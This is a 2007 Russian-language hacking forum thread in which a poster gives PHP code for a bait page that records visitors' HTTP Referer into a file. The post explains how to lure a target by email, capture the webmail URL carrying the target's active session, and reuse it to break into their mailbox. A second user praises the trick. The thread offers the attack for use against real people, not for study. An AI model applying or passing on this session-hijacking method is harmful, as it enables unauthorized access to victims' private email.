Мы переехали http://www.webxakep.net

Воскресенье, 22.12.2024
На главную · Регистрация · Войти · Пользователи · User`Bars · Обратная связь · WebTools · Последние сообщения · Поиск

  • Страница 1 из 1
  • 1
Ломанём доверчивых юзеров

DDosT™Дата: Четверг, 31.05.2007, 16:01 | Сообщение # 1
Группа: Удаленные





Интересную фишку прочитал недавно, короче регим какой нить левый сайт, ну например www.prelest.h18.ru, размещаем на нём приманку для юзера которого хотим ломануть, а заодно в файле index.php пишем что-то вроде этого:
---------------------------------------------------------------------------------------------------------
//Код я ща сам настряпал, вы его можете хорошенько автоматизировать
$reff = urldecode(getenv('HTTP_REFERER'));
if ($reff)
{
$file = fopen ("reff.txt","r+");
if ($file)
{
fputs($file, $reff);
fclose($file);
}
else
echo "Не удаётся открыть файл";
}
else
{
$file = fopen("reff.txt","r+");
fputs($file, "referer нулевой... клиент зашёл либо с mail-client либо скопировал сцылку и вставил в адресную строку, нужно заставить человека зайти на свой почтовый ящик через web-интерфейс и щёлкнуть по сцылке, а не копировать её в адресную строку");
}
---------------------------------------------------------------------------------------------------------
Дальше кидаете на мыло юзеру ссылку, www.prelest.h18.ru/index.php и как только он зашёл резво смотрите в файл reff.txt(его тоже нужно предварительно создать), там будет его реферер с которого он пришёл, вот почему так важно чтобы юзер проверял почту через web-интерфейс и щёлкал там по ссылке, а не копировал её в адресную строку. Так вот, вы берёте его реферер и пока он ещё не вышел с почты и сессия действует, вставляете его реферер в адресную строку и вуаля... вы в его почте!
 


EsmiraldaДата: Четверг, 07.06.2007, 16:47 | Сообщение # 2
Полковник
Группа: Новенькие
Сообщений:153
Статус: Offline
Насколько я заметила это не везде срабатывает или просто я не успеваю пока он не выйдет попасть, но идейка неплохая челу, создавшему ее надо памятник поставить во весь рост))

Хакером можешь ты не быть, но знать компьютер ты обязан))

 

  • Страница 1 из 1
  • 1
Поиск:
..:WX Group:..
WebXakep 2007 - 2008 year.
Desing by arXRush & ArxWolf :)
Все прова принадлежат ArxWolf © Webxakep.net, все представленные материалы на портале в целях ознакомления.[Хакерство и Безопасность]
Форум посвящённый сетевой безопасности, хакерству, исследованию, проникновению. Есть темы такие как : Основы новичкам, BUGTRAQ, ICQ, Email, IRC, Skype, MSN, Крякерам, Фрикерам, Мобильные устройства, Вирусология, Кодинг, ОС, Soft, Халява, ЖелезО, Купля, Продажа, Обмен, Трёпка, Книги, Статьи, Новости, Группировки, Взлом.

Rambler's Top100